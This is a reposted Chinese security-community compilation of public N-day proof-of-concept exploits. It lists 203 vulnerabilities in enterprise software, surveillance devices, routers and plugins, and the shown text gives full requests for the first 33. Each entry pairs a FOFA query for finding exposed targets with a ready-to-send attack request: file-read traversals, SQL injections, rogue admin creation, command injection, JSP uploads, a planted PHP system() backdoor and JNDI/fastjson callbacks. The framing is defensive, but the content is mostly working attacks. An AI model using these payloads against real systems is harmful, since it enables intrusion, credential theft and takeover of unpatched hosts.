Internet public vulnerability compilation 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Internet public vulnerability compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive engagements; we hope this article is of some help to defenders. Defenders can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities published at home and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation, please contact the product vendor.

Content: due to length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if the content infringes any party's legal rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list". This article is the most complete version; when using it, press F12 and search for the keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor system static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM system uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. Goanywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 firefighting and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 omni-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor system static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the backend with the default admin account, then perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain a cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used for the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: plant the execution function; the command is passed base64-encoded
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target lab to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request is the base64-encoded command
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
